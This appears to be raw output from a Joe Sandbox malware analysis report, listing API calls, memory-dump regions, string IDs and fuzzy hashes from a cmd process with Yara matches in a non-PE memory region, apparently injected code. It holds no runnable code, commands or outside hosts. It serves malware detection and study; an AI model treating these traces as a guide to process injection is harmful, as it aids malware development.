                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DD3AF8), ref: 02DEA69D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DD3AF8), ref: 02DEA69D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DD836A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DD838B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DD836A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DD838B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DD836A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DD838B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DEA734
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DDAD62
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DEA734
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DEA734
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                        • Instruction ID: b29ffc8b5e5e21e59adb8c19675851903a3bc0de4a7946809bcfd6f3e0b83fa6
                                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                        • Instruction Fuzzy Hash: BB01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DDF050,?,?,00000000), ref: 02DE91EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: a54d11b82f9491412a8726d74d522cee7080b709242b24c571322f1b65061c98
                                                                                        • Instruction ID: 8488fface23e6e4c32c4204c64b11f8fb0332f7ac6774733d87cd38cbe0c5b32
                                                                                        • Opcode Fuzzy Hash: a54d11b82f9491412a8726d74d522cee7080b709242b24c571322f1b65061c98
                                                                                        • Instruction Fuzzy Hash: 4DE06D373813043AE6207599AC02FA7B29CCB81B20F150026FA0EEA2C0D995F80146A4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02DE4536,?,02DE4CAF,02DE4CAF,?,02DE4536,?,?,?,?,?,00000000,00000000,?), ref: 02DEA65D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                        • Instruction ID: 2f96cabc379780f9c9dea0f65dd69bc3103d20034f8df467fb5e129ba9810d10
                                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                        • Instruction Fuzzy Hash: 59E012B2200208ABDB14EF99CC40EA777ADEF88654F118558BA095B281C630F9108AF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DDF1D2,02DDF1D2,?,00000000,?,?), ref: 02DEA800
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction ID: eead998666303cfbcef981d77788e5f78666ce57450a83fbcbe091a9f9718b50
                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction Fuzzy Hash: D0E01AB1200208ABDB10EF49CC84EE737ADEF88650F118154BA0957241C930E8108BF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,02DD8D14,?), ref: 02DDF6FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 755afa4ffb5bb0d6c596bdb6fd38475aeb2c1e8456628ed37241fa372a659550
                                                                                        • Instruction ID: 4bda1cc027d3300c11279f2a0a45ed2697ce192314ed7db990db975a044d4ca5
                                                                                        • Opcode Fuzzy Hash: 755afa4ffb5bb0d6c596bdb6fd38475aeb2c1e8456628ed37241fa372a659550
                                                                                        • Instruction Fuzzy Hash: 91E08C356947842AE711FBB48C12F2277C9AF8AA14F4E40A8F98997BC3E994E5018621
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,02DD8D14,?), ref: 02DDF6FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                        • Instruction ID: e1e619ffb59b9bb63495d65d2d93e137f7e6636b17c1609a66d6a73b84890050
                                                                                        • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                        • Instruction Fuzzy Hash: 54D05E656503082AEA10BAA49C02F2632899B44A04F490064F949963C3D954E4008565
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 215e3bdaafa66f962d69597d52109d5396dd26e004003a19a5cf994982a6641d
                                                                                        • Instruction ID: 72a896b735fd37e95365e07579ed7e3c9f4c3e9ca490358949ea6a68691c5041
                                                                                        • Opcode Fuzzy Hash: 215e3bdaafa66f962d69597d52109d5396dd26e004003a19a5cf994982a6641d
                                                                                        • Instruction Fuzzy Hash: 4CB09B729014D5C5DA51D760470C7177D04E7D1705F15C5F5F1464641E8738C095F177
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 00D841B9
                                                                                        • _get_osfhandle.MSVCRT ref: 00D841CA
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00D84205
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D8426C
                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00D89E02,?,00000010), ref: 00D84283
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D84292
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D842B1
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D842C4
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00D842D2
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D842D9
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00D8432F
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D84336
                                                                                        • _wcsnicmp.MSVCRT ref: 00D843DB
                                                                                        • _wcsnicmp.MSVCRT ref: 00D843F0
                                                                                        • _wcsnicmp.MSVCRT ref: 00D84405
                                                                                        • _wcsnicmp.MSVCRT ref: 00D8441A
                                                                                        • _wcsnicmp.MSVCRT ref: 00D8442F
                                                                                        • _wcsnicmp.MSVCRT ref: 00D84444
                                                                                        • _wcsnicmp.MSVCRT ref: 00D84459
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 00D844A5
                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00D844F0
                                                                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 00D84506
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 00D8451D
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00D84565
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D8456C
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 00D84595
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D8459C
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D845C3
                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00D89E02,?,00000000), ref: 00D845D4
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D845DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                        • API String ID: 2991647268-3100821235
                                                                                        • Opcode ID: 896ce618e652127b0f2aba6fbb94a84b6a9776eff193a81cab80154524d64470
                                                                                        • Instruction ID: affff6aa650afa85178fc6df3e6bd63a4b1656fd19d651cf28e177b684429f30
                                                                                        • Opcode Fuzzy Hash: 896ce618e652127b0f2aba6fbb94a84b6a9776eff193a81cab80154524d64470
                                                                                        • Instruction Fuzzy Hash: 9AC17E70604302AFD710AF68DC49A2BBBE5FF89714F084A2DF956C62A0D7B5C945CB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D68791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00D66906,0000001F,?,00000080), ref: 00D68791
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,00D9C9E0,00000008), ref: 00D6859E
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00D685BC
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00D68614
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00D68653
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00D9C9D0,00000008), ref: 00D6867D
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00D9C970,00000020), ref: 00D68698
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00D9C930,00000020), ref: 00D686B0
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,00D9C8F0,00000020), ref: 00D686C8
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,00D9C8B0,00000020), ref: 00D686E0
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,00D9C870,00000020), ref: 00D686F8
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,00D9C830,00000020), ref: 00D68710
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,00D9C7F0,00000020), ref: 00D68728
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,00D9C9C0,00000008), ref: 00D68743
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,00D9C9B0,00000008), ref: 00D6875B
                                                                                        • setlocale.MSVCRT ref: 00D68770
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale$DefaultUsersetlocale
                                                                                        • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                        • API String ID: 1351325837-2236139042
                                                                                        • Opcode ID: 5972d3d047ee81289b98f7569fd504c22eb23ccc0cac9fe4a3451aba15320f4d
                                                                                        • Instruction ID: 22c008ee40d72c16e721393420a4e41b2fe9b54a1b2fa79aba934d7ad4d426b7
                                                                                        • Opcode Fuzzy Hash: 5972d3d047ee81289b98f7569fd504c22eb23ccc0cac9fe4a3451aba15320f4d
                                                                                        • Instruction Fuzzy Hash: 75C1C471710312A7DB304F39CD08B7B27A9AF51768F68922BE94ADA285FB74C941C770
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,00D8C9D0,00000108,00D72107,?,00000000,00000000,00000000), ref: 00D694AA
                                                                                        • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 00D694D9
                                                                                        • memset.MSVCRT ref: 00D694F1
                                                                                        • memset.MSVCRT ref: 00D6954A
                                                                                        • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 00D6955D
                                                                                          • Part of subcall function 00D71D90: _wcsnicmp.MSVCRT ref: 00D71E14
                                                                                        • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 00D695B8
                                                                                        • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00D69602
                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00D69624
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00D7BDF1
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00D7BE0D
                                                                                        • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 00D7BE26
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                                        • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                                        • API String ID: 1449572041-3461277227
                                                                                        • Opcode ID: 7e1ba04c699f0e52202a5d8910ecb94f31d7aa414286e212d055cf7f025fd493
                                                                                        • Instruction ID: 82748dc59cb3a2ce3dd66704ad059fa7dadcd676a14c880d5fd66ca9550a35f6
                                                                                        • Opcode Fuzzy Hash: 7e1ba04c699f0e52202a5d8910ecb94f31d7aa414286e212d055cf7f025fd493
                                                                                        • Instruction Fuzzy Hash: 77C17D71A003149FDB249FA4CC55BAAB7B8EF45714F1480AAF64AD7290EB708D84CF72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: [...]$ [..]$ [.]$...$:
                                                                                        • API String ID: 0-1980097535
                                                                                        • Opcode ID: aa004f95f981fcc9ed7dfe07ddd7c2d29396efc68b3c753ca2f54c39a13b4879
                                                                                        • Instruction ID: a284845d0c6eb5b33e753e894a176b6a36eec5a5cf4b50f318301824edb0474e
                                                                                        • Opcode Fuzzy Hash: aa004f95f981fcc9ed7dfe07ddd7c2d29396efc68b3c753ca2f54c39a13b4879
                                                                                        • Instruction Fuzzy Hash: EC127CB02083419BD724DF24C889A6FB7E9EF88344F44892DF58AC7291EB74D945DB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00D8E590,?,00002000), ref: 00D66896
                                                                                        • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D668AA
                                                                                        • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00D668BE
                                                                                        • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D668D2
                                                                                        • realloc.MSVCRT ref: 00D7A5E7
                                                                                          • Part of subcall function 00D68791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00D66906,0000001F,?,00000080), ref: 00D68791
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00D66907
                                                                                        • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 00D6698F
                                                                                        • memmove.MSVCRT ref: 00D66A86
                                                                                        • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00D66AAF
                                                                                        • realloc.MSVCRT ref: 00D66ACA
                                                                                        • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00D66AFE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                                                        • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                                        • API String ID: 2927284792-4023967598
                                                                                        • Opcode ID: b8204b647e76a2133eed7d0544b804948cabff085d208bf862eb38d8e1911bb6
                                                                                        • Instruction ID: be0bace6bdcded015186d00a73db9b84752f31d3007bad5f26d1b1f24b1f3876
                                                                                        • Opcode Fuzzy Hash: b8204b647e76a2133eed7d0544b804948cabff085d208bf862eb38d8e1911bb6
